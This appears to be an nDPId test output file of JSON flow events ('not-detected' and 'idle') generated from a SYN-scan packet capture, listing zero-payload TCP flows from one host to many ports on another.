-00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":280,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":280,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":280,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":280,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":695,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":51493,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":695,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":51493,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":752,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":51493,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":752,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":51493,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":747,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":301,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":747,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":808,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":301,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":808,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":579,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":55600,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":579,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":55600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":641,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":55600,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":641,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":55600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1939,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":306,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1939,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":306,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1983,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":306,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1983,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":306,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1470,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060695,"flow_last_seen":1278275060695,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1470,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060695,"flow_last_seen":1278275060695,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1531,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1531,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1898,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":311,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1898,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":311,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1954,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":311,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1954,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":311,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1795,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2366,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1795,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2366,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":985,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":31038,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":985,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":31038,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1862,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2366,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1862,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2366,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1062,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":31038,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1062,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":31038,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":546,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10566,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":546,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":601,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10566,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":601,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1016,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2381,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1016,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2381,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1089,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2381,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1089,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2381,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2382,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2382,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":740,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2383,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 